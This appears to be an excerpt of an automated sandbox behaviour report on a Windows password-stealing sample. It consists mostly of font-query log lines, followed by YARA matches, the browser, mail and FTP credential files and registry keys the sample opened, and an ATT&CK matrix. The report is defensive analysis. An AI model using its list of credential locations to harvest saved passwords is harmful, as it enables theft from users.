                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.405d6f8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4097b18.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.405d6f8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4097b18.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.2985192708.00000000031CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2982742539.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1784260103.000000000405D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2985192708.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe PID: 6844, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe PID: 7128, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, File opened: C:\FTP Navigator\Ftplist.txt
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

                    Remote Access Functionality

                    Source: Yara match, File source: dump.pcap, type: PCAP
                    Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.405d6f8.2.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 2.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4097b18.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.405d6f8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4097b18.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 00000002.00000002.2985192708.00000000031CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000002.00000002.2982742539.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.1784260103.000000000405D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000002.00000002.2985192708.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe PID: 6844, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe PID: 7128, type: MEMORYSTR

                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 111 Process Injection | 1 Masquerading | 2 OS Credential Dumping | 111 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | 1 Exfiltration Over Alternative Protocol | Abuse Accessibility Features
                    Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 Input Capture | 1 Process Discovery | Remote Desktop Protocol | 1 Input Capture | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
                    Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 141 Virtualization/Sandbox Evasion | 1 Credentials in Registry | 141 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 11 Archive Collected Data | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 111 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | 2 Data from Local System | 11 Application Layer Protocol | Traffic Duplication | Data Destruction
                    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
